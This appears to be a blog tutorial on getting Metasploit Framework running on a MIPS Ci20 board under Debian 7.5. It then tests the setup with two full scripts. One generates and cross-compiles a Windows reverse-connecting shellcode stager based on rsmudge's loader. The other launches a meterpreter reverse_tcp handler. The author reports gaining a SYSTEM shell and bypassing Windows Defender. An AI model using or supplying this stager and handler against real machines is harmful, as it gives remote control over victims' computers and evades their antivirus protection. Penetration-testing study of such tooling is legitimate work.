Running Metasploit Framework on Debian 7.5 mipsel Ci20

The stock Debian Linux 7.5  does not have new Ruby in the repos for the mipsel architecture, so I have decided to use Ruby24 from pkgsrc (check the previous two articles)   I have created a small repo of all binary packages I have managed to build via pkgsrc here :

https://45.76.81.249:8000/pkgsrc/debian-ci20/All/

So once I got the ruby24 up and running I have setup the environment for Metasploit Framework

- Make sure you set symlinks to pkgsrc ruby 
root@mipsbox:/usr/bin# 
 0 lrwxrwxrwx 1 root root 19 Dec 10 20:03 ruby -> /usr/pkg/bin/ruby24
 0 lrwxrwxrwx 1 root root 18 Dec 10 20:03 gem -> /usr/pkg/bin/gem24
 0 lrwxrwxrwx 1 root root 19 Dec 10 20:14 bundle -> /usr/pkg/bin/bundle
 0 lrwxrwxrwx 1 root root 20 Dec 10 20:14 bundler -> /usr/pkg/bin/bundler

- Proceed on setting up Metasploit-Framework 

root@mipsbox:~/# git clone https://github.com/rapid7/metasploit-framework
root@mipsbox:~/# cd metasploit-framework 
root@mipsbox:~/metasploit-framework# apt-get install libpcap0.8-dev
root@mipsbox:~/metasploit-framework# apt-get install libsqlite3-dev
root@mipsbox:~/metasploit-framework# gem install backports
root@mipsbox:~/metasploit-framework# gem install os 
root@mipsbox:~/metasploit-framework# git config --global user.name "user"
root@mipsbox:~/metasploit-framework# git config --global user.email "user@email.com"
root@mipsbox:~/metasploit-framework# bundle install
root@mipsbox:~/metasploit-framework#./msfupdate

Now once we have a Metasploit running on the Ci20 (takes approx 3-4 minutes to load) we should put it under some test to see if it works off the mipsel architecture.

So I have used the following scenario for the test ->

• Generate a payload.exe on the Ci20 mipsel device via a custom generator script
• Move the payload.exe to another machine that will host it via Samba, run strip on x86 architecture to get rid of all symbols from payload.exe – this cannot be done on the mispel arch.
• Execute the listener on the Ci20 mipsel device
• Execute the payload.exe on Windows 10 (Nov 2017 cumulative updates)

So for the Ci20 in order to cross-compile Win PE32/64 binaries we need mingw and that could be installed via apt

root@mipsbox:~/metasploit-framework# apt-get install gcc-mingw-w64-i686 gcc-mingw-w64-x86-64

The Generator and the Listener used in these tests are here:

Generator :

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo "****************************************************************" 
echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port

echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c 
echo -n 'unsigned char server[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char serverp[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo ' WSADATA wsaData;' >> temp.c 
echo ' WORD wVersionRequested;' >> temp.c 
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo ' printf("bad\n"); '>> temp.c 
echo ' WSACleanup(); '>> temp.c 
echo ' exit(1);'>> temp.c 
echo ' }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo ' printf("r %s\n", error);'>> temp.c 
echo ' closesocket(my_socket);'>> temp.c 
echo ' WSACleanup();'>> temp.c 
echo ' exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo ' int tret = 0;'>> temp.c 
echo ' int nret = 0;'>>temp.c 
echo ' void * startb = buffer;'>> temp.c 
echo ' while (tret < len) {'>>temp.c 
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo ' startb += nret;'>> temp.c 
echo ' tret += nret;'>>temp.c 
echo ' if (nret == SOCKET_ERROR)'>> temp.c 
echo ' punt(my_socket, "no data");'>> temp.c 
echo ' }'>>temp.c 
echo ' return tret;'>> temp.c 
echo '}' >> temp.c 
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo ' struct hostent * target;' >> temp.c 
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c 
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c 
echo ' punt(my_socket, ".");'>>temp.c 
echo ' target = gethostbyname(targetip);'>>temp.c 
echo ' if (target == NULL)'>>temp.c 
echo ' punt(my_socket, "..");'>>temp.c 
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo ' sock.sin_family = AF_INET;'>> temp.c 
echo ' sock.sin_port = htons(port);'>>temp.c 
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo ' punt(my_socket, "...");'>>temp.c 
echo ' return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo ' FreeConsole();'>>temp.c 
echo ' Sleep(10);'>>temp.c 
echo ' ULONG32 size;'>>temp.c 
echo ' char * buffer;'>>temp.c 
echo ' void (*function)();'>>temp.c 
echo ' winsock_init();'>> temp.c 
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c 
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo ' if (count != 4 || size <= 0)'>>temp.c 
echo ' punt(my_socket, "error lenght\n");'>>temp.c 
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo ' if (buffer == NULL)'>>temp.c 
echo ' punt(my_socket, "error in buf\n");'>>temp.c 
echo ' buffer[0] = 0xBF;'>>temp.c 
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo ' function = (void (*)())buffer;'>>temp.c 
echo ' function();'>>temp.c 
echo ' return 0;'>>temp.c 
echo '}' >> temp.c 
echo '(+) Compiling binary ..' 
i686-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows 
ls -la temp.c
file=`ls -la payload.exe` ; echo '(+)' $file

Listener

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

The result was good, a reverse shell was acquired, session was elevated to NT AUTHORITY/SYSTEM and inbuilt Windows Defender bypassed.

Video attached